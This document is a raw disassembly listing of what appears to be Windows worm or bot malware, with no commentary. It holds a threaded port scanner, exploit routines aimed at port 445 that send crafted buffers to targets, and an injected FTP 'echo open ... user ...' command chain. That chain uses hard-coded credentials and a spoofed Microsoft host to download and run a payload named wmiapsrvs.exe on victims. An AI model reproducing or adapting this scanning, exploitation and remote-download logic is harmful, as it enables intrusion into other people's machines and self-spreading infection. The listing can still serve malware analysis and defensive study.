push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s: %s stopped. (%d thread(s) stopped.)"...
push eax
call sub_40D6BB
add esp, 14h
jmp short loc_40AAB0
; ---------------------------------------------------------------------------
loc_40AA96: ; CODE XREF: sub_40AA51+26�j
push [ebp+arg_14]
lea eax, [ebp+var_400]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s: No %s thread found."
push eax
call sub_40D6BB
add esp, 10h
loc_40AAB0: ; CODE XREF: sub_40AA51+43�j
cmp [ebp+arg_C], 0
jnz short loc_40AACE
push [ebp+arg_8]
lea eax, [ebp+var_400]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4017B6
add esp, 10h
loc_40AACE: ; CODE XREF: sub_40AA51+63�j
lea eax, [ebp+var_400]
push eax
call sub_401648
pop ecx
leave
retn
sub_40AA51 endp
; =============== S U B R O U T I N E =======================================
sub_40AADD proc near ; CODE XREF: sub_404901+28B�p
; sub_4056A2+BB�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
imul eax, 434h
xor ecx, ecx
mov dword_42221C[eax], ecx
mov dword_422208[eax], ecx
mov dword_42220C[eax], ecx
mov dword_422210[eax], ecx
mov dword_422214[eax], ecx
mov dword_422218[eax], ecx
mov byte ptr dword_421E08[eax], cl
mov byte_422220[eax], cl
retn
sub_40AADD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40AB1A proc near ; DATA XREF: sub_40198E+1349�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
push [ebp+74h+var_10]
mov dword ptr [eax+94h], 1
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_40A8A6
push [ebp+74h+var_14]
call sub_40AADD
add esp, 14h
push 0
call dword_4190D8 ; ExitThread
int 3 ; Trap to Debugger
sub_40AB1A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AB64 proc near ; CODE XREF: sub_404901+198�p
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_417CBC
mov esi, eax
test esi, esi
jz loc_40AC0B
push edi
push esi
call sub_40E74F
mov edi, eax
test edi, edi
pop ecx
jz short loc_40AC08
push edi
push esi
push [ebp+var_4]
push [ebp+arg_0]
call sub_417CB6
test eax, eax
jz short loc_40ABE2
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push offset asc_41A0E0 ; "\\"
push edi
call sub_417CB0
test eax, eax
jz short loc_40AC01
mov eax, [ebp+var_8]
cmp word ptr [eax+0Eh], 0A28h
jnz short loc_40AC01
movzx eax, word ptr [eax+0Ch]
cmp eax, 884h
jz short loc_40ABFC
cmp eax, 9C9h
jz short loc_40ABF8
cmp eax, 0A7Dh
jz short loc_40ABF4
cmp eax, 0B4Ch
jz short loc_40ABEF
loc_40ABE2: ; CODE XREF: sub_40AB64+3A�j
xor esi, esi
loc_40ABE4: ; CODE XREF: sub_40AB64+8E�j
; sub_40AB64+9B�j
push edi
call sub_40E359
pop ecx
mov eax, esi
jmp short loc_40AC0A
; ---------------------------------------------------------------------------
loc_40ABEF: ; CODE XREF: sub_40AB64+7C�j
push 2
loc_40ABF1: ; CODE XREF: sub_40AB64+92�j
; sub_40AB64+96�j
pop esi
jmp short loc_40ABE4
; ---------------------------------------------------------------------------
loc_40ABF4: ; CODE XREF: sub_40AB64+75�j
push 4
jmp short loc_40ABF1
; ---------------------------------------------------------------------------
loc_40ABF8: ; CODE XREF: sub_40AB64+6E�j
push 3
jmp short loc_40ABF1
; ---------------------------------------------------------------------------
loc_40ABFC: ; CODE XREF: sub_40AB64+67�j
xor esi, esi
inc esi
jmp short loc_40ABE4
; ---------------------------------------------------------------------------
loc_40AC01: ; CODE XREF: sub_40AB64+51�j
; sub_40AB64+5C�j
push edi
call sub_40E359
pop ecx
loc_40AC08: ; CODE XREF: sub_40AB64+29�j
xor eax, eax
loc_40AC0A: ; CODE XREF: sub_40AB64+89�j
pop edi
loc_40AC0B: ; CODE XREF: sub_40AB64+17�j
pop esi
leave
retn
sub_40AB64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AC0E proc near ; CODE XREF: sub_40AD8F:loc_40ADF1�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push 4
lea esi, ds:4C48A0h[esi*8]
lea eax, [ebp+arg_0]
push esi
push eax
call sub_40E3A0
add esp, 0Ch
push [ebp+arg_0]
call dword_4C4760
inc eax
push eax
mov [ebp+arg_0], eax
call dword_4C47B8
mov [ebp+arg_0], eax
push 4
lea eax, [ebp+arg_0]
push eax
push esi
call sub_40E3A0
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_40AC0E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AC56 proc near ; CODE XREF: sub_40AD8F+5A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push [ebp+arg_0]
or esi, 0FFFFFFFFh
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call sub_40D630
cmp eax, 0Fh
pop ecx
jbe short loc_40AC7E
xor eax, eax
jmp short loc_40ACEF
; ---------------------------------------------------------------------------
loc_40AC7E: ; CODE XREF: sub_40AC56+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset dword_419868
push [ebp+arg_0]
call sub_40DCA4
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_40ACAB
call sub_40E04D
mov [ebp+var_C], eax
loc_40ACAB: ; CODE XREF: sub_40AC56+4B�j
cmp [ebp+var_8], esi
jnz short loc_40ACB8
call sub_40E04D
mov [ebp+var_8], eax
loc_40ACB8: ; CODE XREF: sub_40AC56+58�j
cmp [ebp+var_4], esi
jnz short loc_40ACC5
call sub_40E04D
mov [ebp+var_4], eax
loc_40ACC5: ; CODE XREF: sub_40AC56+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_40ACD1
call sub_40E04D
loc_40ACD1: ; CODE XREF: sub_40AC56+74�j
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_4]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov dword_4C48A0[ecx*8], eax
loc_40ACEF: ; CODE XREF: sub_40AC56+26�j
pop esi
leave
retn
sub_40AC56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ACF2 proc near ; CODE XREF: sub_40AD8F+A9�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
push ebx
inc edi
push edi
push 2
mov [ebp+var_4], edi
call dword_4C4690
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40AD1B
xor eax, eax
jmp short loc_40AD8A
; ---------------------------------------------------------------------------
loc_40AD1B: ; CODE XREF: sub_40ACF2+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_4C47DC
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_4C4624
push 10h
lea eax, [ebp+var_1C]
push eax
push esi
call dword_4C463C
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push ebx
lea eax, [ebp+var_120]
push eax
push ebx
push ebx
mov [ebp+var_8], ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_4C4734
push esi
mov edi, eax
call dword_4C479C
xor eax, eax
cmp edi, ebx
setnle al
loc_40AD8A: ; CODE XREF: sub_40ACF2+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_40ACF2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AD8F proc near ; DATA XREF: sub_40AFA2+117�o
var_2A8 = dword ptr -2A8h
var_28C = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_150 = byte ptr -150h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_150]
rep movsd
mov esi, [ebp+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], esi
mov [ebp+arg_0], eax
call dword_4190A8 ; GetTickCount
push eax
call sub_40E043
mov ebx, esi
pop ecx
imul ebx, 434h
jmp loc_40AF7E
; ---------------------------------------------------------------------------
loc_40ADDB: ; CODE XREF: sub_40AD8F+1FD�j
cmp [ebp+var_10], 0
push eax
jz short loc_40ADF1
lea eax, [ebp+var_150]
push eax
call sub_40AC56
pop ecx
jmp short loc_40ADF6
; ---------------------------------------------------------------------------
loc_40ADF1: ; CODE XREF: sub_40AD8F+51�j
call sub_40AC0E
loc_40ADF6: ; CODE XREF: sub_40AD8F+60�j
pop ecx
push [ebp+arg_0]
mov edi, eax
push dword_42220C[ebx]
push [ebp+var_3C]
push edi
call dword_4C4710
push eax
lea eax, [ebp+var_28C]
push offset aIpSDScanTDSubT ; "IP: %s:%d, Scan|t: %d, Sub|thread: %d."
push eax
call sub_40D6BB
lea eax, [ebp+var_28C]
push eax
lea eax, dword_421E08[ebx]
push eax
call sub_40D6BB
push [ebp+var_38]
push [ebp+var_3C]
push edi
call sub_40ACF2
add esp, 2Ch
cmp eax, 1
jnz loc_40AF73
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_40AEC8
push offset dword_4C58A0
call dword_419160 ; RtlEnterCriticalSection
push [ebp+var_3C]
push edi
call dword_4C4710
push eax
lea eax, [ebp+var_28C]
push offset aIpSPortDIs0p3n ; "IP %s, Port %d is 0p3n."
push eax
call sub_40D6BB
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_40AEAA
cmp [ebp+var_C0], 0
push [ebp+var_18]
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_C0]
jnz short loc_40AE9E
lea eax, [ebp+var_140]
loc_40AE9E: ; CODE XREF: sub_40AD8F+107�j
push eax
push [ebp+var_40]
call sub_4017B6
add esp, 10h
loc_40AEAA: ; CODE XREF: sub_40AD8F+EE�j
lea eax, [ebp+var_28C]
push eax
call sub_401648
mov [esp+2A8h+var_2A8], offset dword_4C58A0
call dword_41915C ; RtlLeaveCriticalSection
jmp loc_40AF73
; ---------------------------------------------------------------------------
loc_40AEC8: ; CODE XREF: sub_40AD8F+BE�j
push edi
call dword_4C4710
push eax
lea eax, [ebp+var_208]
push eax
call sub_40D6BB
mov eax, [ebp+var_20]
imul eax, 3Ch
add eax, offset aAs445 ; "as445"
push eax
lea eax, [ebp+var_178]
push eax
call sub_40D6BB
add esp, 10h
cmp [ebp+var_C0], 0
lea eax, [ebp+var_C0]
jnz short loc_40AF0C
lea eax, [ebp+var_140]
loc_40AF0C: ; CODE XREF: sub_40AD8F+175�j
push eax
lea eax, [ebp+var_1F8]
push eax
call sub_40D6BB
mov eax, [ebp+var_40]
mov [ebp+var_20C], eax
mov eax, [ebp+var_18]
mov [ebp+var_15C], eax
mov eax, [ebp+var_14]
mov [ebp+var_158], eax
mov eax, [ebp+var_3C]
mov [ebp+var_16C], eax
mov eax, [ebp+var_20]
pop ecx
mov [ebp+var_164], eax
imul eax, 3Ch
pop ecx
sub esp, 0BCh
push 2Fh
pop ecx
mov [ebp+var_168], esi
lea esi, [ebp+var_20C]
mov edi, esp
rep movsd
call off_41EE7C[eax]
mov esi, [ebp+var_4]
add esp, 0BCh
loc_40AF73: ; CODE XREF: sub_40AD8F+B4�j
; sub_40AD8F+134�j
push 7D0h
call dword_419060 ; Sleep
loc_40AF7E: ; CODE XREF: sub_40AD8F+47�j
mov eax, dword_42220C[ebx]
cmp dword_4C48A4[eax*8], 0
jnz loc_40ADDB
push esi
call sub_40AADD
pop ecx
push 0
call dword_4190D8 ; ExitThread
int 3 ; Trap to Debugger
sub_40AD8F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AFA2 proc near ; DATA XREF: sub_40198E+1CA5�o
; sub_40198E+2CE3�o
var_208 = dword ptr -208h
var_1CC = byte ptr -1CCh
var_14C = byte ptr -14Ch
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+arg_0]
push esi
push edi
push 53h
pop ecx
mov esi, eax
lea edi, [ebp+var_14C]
rep movsd
xor edi, edi
inc edi
mov [eax+144h], edi
lea eax, [ebp+var_14C]
push eax
call dword_4C4704
mov ecx, [ebp+var_2C]
push 3
mov dword_4C48A0[ecx*8], eax
call sub_40AA32
cmp eax, edi
pop ecx
jnz short loc_40B04F
mov esi, offset dword_4C58A0
push esi
call dword_419168 ; RtlDeleteCriticalSection
push 80000400h
push esi
call dword_419164 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_40B04F
lea eax, [ebp+var_1CC]
push offset aFailedToInitia ; "Failed to initialize critical section."
push eax
call sub_40D6BB
cmp [ebp+var_10], 0
pop ecx
pop ecx
jnz short loc_40B03A
push [ebp+var_14]
lea eax, [ebp+var_1CC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_4017B6
add esp, 10h
loc_40B03A: ; CODE XREF: sub_40AFA2+7A�j
lea eax, [ebp+var_1CC]
push eax
call sub_401648
pop ecx
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_40B04F: ; CODE XREF: sub_40AFA2+45�j
; sub_40AFA2+61�j
mov eax, [ebp+var_2C]
mov esi, dword_419060
xor ebx, ebx
cmp [ebp+var_20], edi
mov dword_4C48A4[eax*8], edi
jb loc_40B10E
loc_40B06A: ; CODE XREF: sub_40AFA2+166�j
push edi
push [ebp+var_2C]
lea eax, [ebp+var_14C]
push [ebp+var_38]
mov [ebp+var_24], edi
push eax
lea eax, [ebp+var_1CC]
push offset aSDScann3rThrea ; "%s:%d, Scann3r thread: %d, Sub|thread: "...
push eax
call sub_40D6BB
push ebx
lea eax, [ebp+var_1CC]
push 3
push eax
call sub_40A83B
mov ecx, [ebp+var_2C]
mov [ebp+var_28], eax
imul eax, 434h
add esp, 24h
push ebx
push ebx
mov dword_42220C[eax], ecx
lea eax, [ebp+var_14C]
push eax
push offset sub_40AD8F
push ebx
push ebx
call dword_4190B0 ; CreateThread
mov ecx, [ebp+var_28]
imul ecx, 434h
cmp eax, ebx
mov dword_42221C[ecx], eax
jnz short loc_40B125
call dword_4190AC ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_1CC]
push offset aFailedToStarTh ; "Failed to star thr34d, error: <%d>."
push eax
call sub_40D6BB
lea eax, [ebp+var_1CC]
push eax
call sub_401648
add esp, 10h
loc_40B100: ; CODE XREF: sub_40AFA2+188�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+var_20]
jbe loc_40B06A
loc_40B10E: ; CODE XREF: sub_40AFA2+C2�j
cmp [ebp+var_30], ebx
jz short loc_40B133
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax
call esi ; Sleep
jmp short loc_40B140
; ---------------------------------------------------------------------------
loc_40B121: ; CODE XREF: sub_40AFA2+186�j
push 1Eh
call esi ; Sleep
loc_40B125: ; CODE XREF: sub_40AFA2+135�j
cmp [ebp+var_4], ebx
jz short loc_40B121
jmp short loc_40B100
; ---------------------------------------------------------------------------
loc_40B12C: ; CODE XREF: sub_40AFA2+19C�j
push 7D0h
call esi ; Sleep
loc_40B133: ; CODE XREF: sub_40AFA2+16F�j
mov eax, [ebp+var_2C]
cmp dword_4C48A4[eax*8], 1
jz short loc_40B12C
loc_40B140: ; CODE XREF: sub_40AFA2+17D�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, dword_4C48A0[eax*8]
push eax
call dword_4C4710
push eax
lea eax, [ebp+var_1CC]
push offset aFinishedAtSDAf ; "Finished at %s:%d after %d minute(s) of"...
push eax
call sub_40D6BB
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_40B18D
push [ebp+var_14]
lea eax, [ebp+var_1CC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_4017B6
add esp, 10h
loc_40B18D: ; CODE XREF: sub_40AFA2+1CD�j
lea eax, [ebp+var_1CC]
push eax
call sub_401648
mov eax, [ebp+var_2C]
mov dword_4C48A4[eax*8], ebx
mov [esp+208h+var_208], 0BB8h
call esi ; Sleep
push 3
call sub_40AA32
cmp eax, 1
pop ecx
jnz short loc_40B1C4
push offset dword_4C58A0
call dword_419168 ; RtlDeleteCriticalSection
loc_40B1C4: ; CODE XREF: sub_40AFA2+215�j
push [ebp+var_2C]
call sub_40AADD
pop ecx
push ebx
call dword_4190D8 ; ExitThread
int 3 ; Trap to Debugger
sub_40AFA2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B1D5 proc near ; CODE XREF: sub_40B31C+42E�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 5A0h
push esi
push edi
push 10h
xor esi, esi
lea eax, [ebp+var_10]
push esi
push eax
call sub_40D7B0
add esp, 0Ch
lea eax, [ebp+arg_4]
push eax
mov [ebp+var_10], 2
call dword_4C4704
mov [ebp+var_C], eax
xor eax, eax
mov ax, word ptr dword_4C58B8
push eax
call dword_4C47DC
push esi
push 1
push 2
mov [ebp+var_E], ax
call dword_4C4690
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40B23B
push 10h
lea eax, [ebp+var_10]
push eax
push edi
call dword_4C463C
cmp eax, 0FFFFFFFFh
jnz short loc_40B242
loc_40B23B: ; CODE XREF: sub_40B1D5+52�j
xor al, al
jmp loc_40B318
; ---------------------------------------------------------------------------
loc_40B242: ; CODE XREF: sub_40B1D5+64�j
push ebx
push esi
mov ebx, 400h
push ebx
lea eax, [ebp+var_5A0]
push eax
push edi
call dword_4C45F4
mov eax, offset aSvchost_exe ; "svchost.exe"
push eax
push eax
push offset aPassword ; "password"
push offset aMircosoft ; "mircosoft"
push dword_41E264
mov esi, 190h
push offset aMs_microsoft_c ; "ms.microsoft.com"
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user %s %s >> "...
lea eax, [ebp+var_1A0]
push esi
push eax
call sub_40DFEC
add esp, 24h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push edi
call dword_4C4724
cmp eax, 0FFFFFFFFh
jnz short loc_40B2B5
loc_40B2B1: ; CODE XREF: sub_40B1D5+126�j
xor al, al
jmp short loc_40B317
; ---------------------------------------------------------------------------
loc_40B2B5: ; CODE XREF: sub_40B1D5+DA�j
push 1F4h
call dword_419060 ; Sleep
push offset aWmiapsrvs_exe ; "wmiapsrvs.exe"
push offset aS ; "%s\r\n"
lea eax, [ebp+var_1A0]
push esi
push eax
call sub_40DFEC
add esp, 10h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_40D630
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push edi
call dword_4C4724
cmp eax, 0FFFFFFFFh
jz short loc_40B2B1
push 0
push ebx
lea eax, [ebp+var_5A0]
push eax
push edi
call dword_4C45F4
push edi
call dword_4C479C
mov al, 1
loc_40B317: ; CODE XREF: sub_40B1D5+DE�j
pop ebx
loc_40B318: ; CODE XREF: sub_40B1D5+68�j
pop edi
pop esi
leave
retn
sub_40B1D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B31C proc near ; CODE XREF: .text:0040B884�p
; .text:0040B8A6�p
var_89B4 = byte ptr -89B4h
var_894C = byte ptr -894Ch
var_68DC = byte ptr -68DCh
var_686C = byte ptr -686Ch
var_5DA8 = byte ptr -5DA8h
var_4804 = byte ptr -4804h
var_4803 = byte ptr -4803h
var_3770 = byte ptr -3770h
var_2CAC = byte ptr -2CACh
var_2CAB = byte ptr -2CABh
var_2CA8 = byte ptr -2CA8h
var_2C2C = byte ptr -2C2Ch
var_245C = byte ptr -245Ch
var_1FB1 = byte ptr -1FB1h
var_1CC4 = byte ptr -1CC4h
var_14E0 = byte ptr -14E0h
var_14D0 = byte ptr -14D0h
var_11AC = byte ptr -11ACh
var_11A8 = byte ptr -11A8h
var_119C = byte ptr -119Ch
var_F14 = byte ptr -0F14h
var_E74 = byte ptr -0E74h
var_768 = dword ptr -768h
var_758 = byte ptr -758h
var_744 = byte ptr -744h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 89B4h
call sub_40D9A0
mov eax, dword_41B860
push ebx
mov [ebp+var_10], eax
mov eax, dword_41B864
push esi
mov [ebp+var_C], eax
push edi
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_3C]
push offset loc_41B854
push eax
call sub_40D6BB
add esp, 0Ch
xor ebx, ebx
xor eax, eax
loc_40B355: ; CODE XREF: sub_40B31C+4F�j
mov cl, [ebp+eax+var_3C]
mov [ebp+eax*2+var_104], cl
mov [ebp+eax*2+var_103], bl
inc eax
cmp eax, 28h
jl short loc_40B355
push 60h
lea eax, [ebp+var_B4]
push offset dword_41F4B0
push eax
call sub_40E3A0
lea eax, [ebp+var_3C]
push eax
call sub_40D630
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_40E3A0
add esp, 1Ch
push 9
lea eax, [ebp+var_3C]
push (offset aC+3)
push eax
call sub_40D630
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_40E3A0
lea eax, [ebp+var_3C]
push eax
call sub_40D630
add al, 1Ah
shl al, 1
mov [ebp+var_1], al
push 1
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_40E3A0
lea eax, [ebp+var_3C]
push eax
call sub_40D630
shl al, 1
add al, 9
mov [ebp+var_2], al
push 1
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_87]
push eax
call sub_40E3A0
xor eax, eax
mov ax, word ptr dword_4C58B8
add esp, 2Ch
push eax
call dword_4C47DC
push 2
xor eax, 9999h
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
push offset dword_41F1A8
call sub_40E3A0
add esp, 0Ch
cmp [ebp+arg_C0], ebx
jz loc_40B51C
mov edi, 0DACh
push edi
lea eax, [ebp+var_1CC4]
push 90h
push eax
call sub_40D7B0
mov eax, [ebp+arg_C0]
imul eax, 3Ch
lea eax, dword_41F8F0[eax]
push 4
push eax
mov [ebp+var_14], eax
lea eax, [ebp+var_14E0]
push eax
call sub_40E3A0
mov esi, offset loc_41F0F8
push esi
call sub_40D630
push eax
lea eax, [ebp+var_14D0]
push esi
push eax
call sub_40E3A0
push 4
lea eax, [ebp+var_11AC]
push offset loc_41B84C
push eax
call sub_40E3A0
push 4
push [ebp+var_14]
lea eax, [ebp+var_11A8]
push eax
call sub_40E3A0
add esp, 40h
push esi
call sub_40D630
push eax
lea eax, [ebp+var_119C]
push esi
push eax
call sub_40E3A0
add esp, 10h
xor eax, eax
loc_40B4CE: ; CODE XREF: sub_40B31C+1CA�j
mov cl, [ebp+eax+var_1CC4]
mov [ebp+eax*2+var_4804], cl
mov [ebp+eax*2+var_4803], bl
inc eax
cmp eax, edi
jl short loc_40B4CE
mov esi, 1C52h
push esi
lea eax, [ebp+var_89B4]
push 31h
push eax
mov [ebp+var_2CAC], bl
mov [ebp+var_2CAB], bl
call sub_40D7B0
push esi
lea eax, [ebp+var_68DC]
push 31h
push eax
call sub_40D7B0
add esp, 18h
jmp short loc_40B573
; ---------------------------------------------------------------------------
loc_40B51C: ; CODE XREF: sub_40B31C+11B�j
push 7D0h
lea eax, [ebp+var_F14]
push 90h
push eax
call sub_40D7B0
mov esi, offset loc_41F0F8
push esi
call sub_40D630
push eax
lea eax, [ebp+var_E74]
push esi
push eax
call sub_40E3A0
lea eax, [ebp+var_10]
push eax
call sub_40D630
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_758]
push eax
call sub_40E3A0
mov eax, dword_41F8F0
add esp, 2Ch
mov [ebp+var_768], eax
loc_40B573: ; CODE XREF: sub_40B31C+1FE�j
push 0E29h
lea eax, [ebp+var_2CA8]
push 31h
push eax
call sub_40D7B0
movsx eax, [ebp+var_1]
mov edi, [ebp+arg_BC]
add esp, 0Ch
push ebx
add eax, 4
push eax
lea eax, [ebp+var_B4]
push eax
push edi
call dword_4C4724
cmp eax, 0FFFFFFFFh
jnz short loc_40B5B2
loc_40B5AB: ; CODE XREF: sub_40B31C+2BD�j
; sub_40B31C+2E4�j ...
xor al, al
jmp loc_40B75A
; ---------------------------------------------------------------------------
loc_40B5B2: ; CODE XREF: sub_40B31C+28D�j
push ebx
mov esi, 640h
push esi
lea eax, [ebp+var_744]
push eax
push edi
call dword_4C45F4
push ebx
push 68h
push offset dword_41F518
push edi
call dword_4C4724
cmp eax, 0FFFFFFFFh
jz short loc_40B5AB
push ebx
push esi
lea eax, [ebp+var_744]
push eax
push edi
call dword_4C45F4
push ebx
push 0A0h
push offset dword_41F588
push edi
call dword_4C4724
cmp eax, 0FFFFFFFFh
jz short loc_40B5AB
push ebx
push esi
lea eax, [ebp+var_744]
push eax
push edi
call dword_4C45F4
cmp [ebp+arg_C0], ebx
jz loc_40B6C8
push 68h
lea eax, [ebp+var_89B4]
push offset dword_41F748
push eax
call sub_40E3A0
push 1B5Ah
lea eax, [ebp+var_4804]
push eax
lea eax, [ebp+var_894C]
push eax
call sub_40E3A0
push 70h
lea eax, [ebp+var_68DC]
push offset dword_41F7B8
push eax
call sub_40E3A0
push 0A5Eh
lea eax, [ebp+var_3770]
push eax
lea eax, [ebp+var_686C]
push eax
call sub_40E3A0
push 84h
lea eax, [ebp+var_5DA8]
push offset dword_41F830
push eax
call sub_40E3A0
add esp, 3Ch
push ebx
push 10FCh
lea eax, [ebp+var_89B4]
push eax
push edi
call dword_4C4724
cmp eax, 0FFFFFFFFh
jz loc_40B5AB
push ebx
push esi
lea eax, [ebp+var_744]
push eax
push edi
call dword_4C45F4
push ebx
push 0FDCh
lea eax, [ebp+var_68DC]
jmp short loc_40B71E
; ---------------------------------------------------------------------------
loc_40B6C8: ; CODE XREF: sub_40B31C+2FC�j
push 7Ch
lea eax, [ebp+var_2CA8]
push offset dword_41F630
push eax
call sub_40E3A0
push 7D0h
lea eax, [ebp+var_F14]
push eax
lea eax, [ebp+var_2C2C]
push eax
call sub_40E3A0
push 90h
lea eax, [ebp+var_245C]
push offset off_41F6B0
push eax
call sub_40E3A0
add esp, 24h
push ebx
mov [ebp+var_1FB1], bl
push 0CF8h
lea eax, [ebp+var_2CA8]
loc_40B71E: ; CODE XREF: sub_40B31C+3AA�j
push eax
push edi
call dword_4C4724
cmp eax, 0FFFFFFFFh
jz loc_40B5AB
push 12Ch
call dword_419060 ; Sleep
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+arg_0]
mov edi, esp
rep movsd
call sub_40B1D5
add esp, 0BCh
test al, al
setnz al
